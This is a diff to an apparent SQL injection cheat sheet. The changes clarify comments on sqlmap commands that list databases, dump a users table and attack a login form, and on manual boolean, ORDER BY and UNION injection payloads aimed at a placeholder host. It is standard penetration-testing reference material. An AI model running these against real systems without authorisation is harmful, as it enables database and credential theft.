 sqlmap -u "http://target.com/page?id=1" --dbs # list databases

-sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables
+sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables in a DB

-sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
+sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # dump a table

-# sqlmap with POST request
+# sqlmap against a POST login form

 sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

-# sqlmap with cookies
+# sqlmap with session cookie (authenticated endpoint)

 sqlmap -u "http://target.com/page" --cookie="session=abc123"

-# sqlmap with Burp request file
+# sqlmap from a saved Burp Suite request file

 sqlmap -r request.txt

-' AND 1=1-- - # true
+' AND 1=1-- - # true condition

-' AND 1=2-- - # false
+' AND 1=2-- - # false condition — response differs

-' ORDER BY 2-- - # increment until error
+' ORDER BY 1-- - # increment until error

 ' UNION SELECT NULL,NULL,NULL-- -